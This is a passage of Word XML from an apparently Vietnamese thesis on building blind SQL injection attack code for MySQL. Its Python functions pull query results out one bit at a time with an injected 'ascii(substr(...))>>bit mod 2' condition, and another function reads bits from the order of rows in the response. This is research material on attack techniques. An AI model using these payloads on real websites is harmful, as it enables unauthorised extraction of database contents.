          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t># bit i is 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>self.logger.debug("Bit {0} is 1".format(i))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t xml:space="preserve">tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>tmp + pow(2,i)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>self.logger.debug("Bit {0} is 0".format(i))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00555378" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>tmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F84439" w:rsidRPr="00922FC1" w:rsidRDefault="002E332A" w:rsidP="002E332A">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00555378">
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidR="00555378" w:rsidRPr="00555378">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r w:rsidR="00555378">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">() sử dụng thuật toán tương tự hàm </w:t>
      </w:r>
      <w:r w:rsidR="00555378" w:rsidRPr="006A00C0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r w:rsidR="00555378">
        <w:t>(), tuy nhiên sẽ lần lượt lấy giá trị từng ký tự.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidTr="00F84439">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:t>def getMySQLQueryResult(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="008F573F">
              <w:t>Bit shift</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>if(self.resultLength != None):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>for i in range(0, self.resultLength):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t># Single character</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t xml:space="preserve">tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>for j in reversed(range(0, 7)):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>if(self.checkQuery(" and (((ascii(substr({0},{1},1))&gt;&gt;{2}) mod 2)=1)".format(query, (i+1),j)) == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>self.logger.debug("Bit {0} is 1".format(j))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t xml:space="preserve">tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>tmp + pow(2,j)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>self.logger.debug("Bit {0} is 0".format(j))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(tmp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>chr(tmp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t># Second get result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F84439" w:rsidRDefault="00F84439" w:rsidP="00F84439">
      <w:r>
        <w:t xml:space="preserve">Hàm runner thực hiện chạy câu lệnh SQL, gọi đến hàm </w:t>
      </w:r>
      <w:r w:rsidR="00731E3A" w:rsidRPr="00731E3A">
        <w:t>runMySQLQuery</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00731E3A">
        <w:t>, từ đây sẽ lần lượt thực hiện lấy độ dài kết quả, rồi lấy từng ký tự</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F84439" w:rsidRDefault="00F84439" w:rsidP="00F84439">
      <w:r>
        <w:t>Hàm __init__ th</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ực hiện khởi tạo các thành phần liên quan, cần sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E332A" w:rsidRPr="00922FC1" w:rsidRDefault="00F84439" w:rsidP="00B33ABE">
      <w:r>
        <w:t xml:space="preserve">Chi tiết về toàn bộ mã tấn công của phương pháp tìm kiếm nhị phân tham khảo </w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mục 3 P</w:t>
      </w:r>
      <w:r>
        <w:t>hụ lục của luận văn</w:t>
      </w:r>
      <w:r w:rsidR="00B33ABE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650956" w:rsidRDefault="00650956" w:rsidP="00FF35AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc459374359"/>
      <w:r>
        <w:t>Xây dựng mã tấn công sử dụng phương pháp phân tích thứ tự trả về</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w:rsidR="00CC2642" w:rsidRDefault="00CC2642" w:rsidP="00CC2642">
      <w:r>
        <w:t>Để xây dựng mã tấn công cho phương pháp phân tích thứ tự trả về, cần xây dựng các hàm sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7CF9" w:rsidRDefault="00DC7CF9" w:rsidP="009B48A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC7CF9">
        <w:t>getQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7CF9" w:rsidRDefault="00DC7CF9" w:rsidP="009B48A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidR="009B48A0" w:rsidRPr="009B48A0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r w:rsidR="009B48A0">
        <w:t xml:space="preserve">() và </w:t>
      </w:r>
      <w:r w:rsidR="009B48A0" w:rsidRPr="009B48A0">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r w:rsidR="009B48A0">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B48A0" w:rsidRDefault="009B48A0" w:rsidP="004064FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các hàm mặc định tuân thủ theo chuẩn của </w:t>
      </w:r>
      <w:r w:rsidRPr="009B48A0">
        <w:t>WETK: Hàm run() và hàm __init().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10140" w:rsidRDefault="00C10140" w:rsidP="00CC2642">
      <w:r>
        <w:t>Hàm getQueryResult() nhận đầu vào là mã tấn công, thực hiện phân tích thứ tự trả về trích xuất ra giá trị của truy vấn.</w:t>
      </w:r>
      <w:r w:rsidR="00724DBD">
        <w:t xml:space="preserve"> Thứ tự ban đầu dùng để tham chiếu được thiết lập trong biến </w:t>
      </w:r>
      <w:r w:rsidR="00724DBD" w:rsidRPr="00724DBD">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>self.standard_dict.</w:t>
      </w:r>
      <w:r w:rsidR="00724DBD">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hàm thực hiện phân tích, tìm ra vị trí của dòng thứ nhất. Sau đó, lần lượt tìm vị trí dòng thứ hai, so sánh với vị trí dòng thứ nhất, nếu đứng trước thì bit đó là 0, nếu đứng sau thì bit đó là 1. Cuối cùng sẽ cộng dồn các giá trị tìm được để trả về kết quả:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidTr="00C10140">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:t>def getQueryResult(self, payload):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t xml:space="preserve">r </w:t>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>self.sendHTTPRequest(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t xml:space="preserve">resultText </w:t>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>r.text</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>pos1 = resultText.find(self.standard_dict[1])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>post_dict = {}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>for i in range(2,10):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>pos = resultText.find(self.standard_dict[i])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>if pos &lt; pos1:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>#Before 1 ==&gt; -@hbn ==&gt; 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>post_dict[i] = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>post_dict[i] = 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>s = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>for i in range(9,1,-1):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>x = pow(2,i-2) * post_dict[i]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>s = s+x</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t>return (s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004064FA" w:rsidRDefault="004064FA" w:rsidP="004064FA">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="009B48A0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() và </w:t>
      </w:r>
      <w:r w:rsidRPr="009B48A0">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() thiết lập mã tấn công, rồi gửi đến hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="004064FA">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>getQueryResult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>() để lấy kết quả. V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ề chức năng các hàm này tương tự hàm trong các module còn lại.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00161298" w:rsidRDefault="00161298" w:rsidP="004064FA">
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="009B48A0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00161298" w:rsidRPr="00161298" w:rsidTr="00161298">
        <w:tc>
          <w:tcPr>
